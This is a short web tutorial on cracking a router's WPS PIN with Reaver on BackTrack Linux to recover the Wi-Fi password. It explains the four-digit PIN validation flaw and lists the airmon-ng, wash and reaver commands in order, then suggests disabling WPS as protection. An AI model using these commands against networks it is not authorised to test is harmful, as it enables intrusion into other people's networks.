First, you will need an USB flash drive to install Linux BackTrack.
BackTrack is a standalone operating system which comes packed with a security suite containing tools for monitoring and security audit. In this case, we will use BackTrack to exploit vulnerabilities of a wireless network.
Do not use this tutorial for malicious purposes !
Reaver tool is by default installed in BackTrack and will help use gain the key, PIN and SSID of the wireless network we want to access. Reaver is exploiting a vulnerability found on most routers and access points featuring WPS (wireless protected setup).
How is the Wi-Fi password snatched?
By using a brute force method, Reaver will try various combinations to uncover the WPS pin. The vulnerability resides in the fact that Reaver can uncover the first 4 digits of the pin and then move on to the next set of 4. Since the router validates the first 4 digits first, Reaver can exploit the vulnerability and reduce brute forcing time
What commands do you use?
- airmon-ng to detect wireless cards
- airmon-ng start wlan0 or wlan1, depending on how many wireless cards are detected and on which one you are willing to use in monitoring mode.
- wash -i mon0 to detect wireless networks. If you get “Found packet with dab FCS, skipping…” error, try using wash -i mon0 –ignore-fcs
- reaver -i mon0 -b “name of BSSID” -d 0 -vv
Now you will have to wait between a few minutes and a few hours before the Wi-Fi password is uncovered.
How do you protect against this exploit?
It’s simple. Just deactivate WPS (it is called QSS on TP-Link routers). It is normally activated by default from factory so the router gets WPS certification.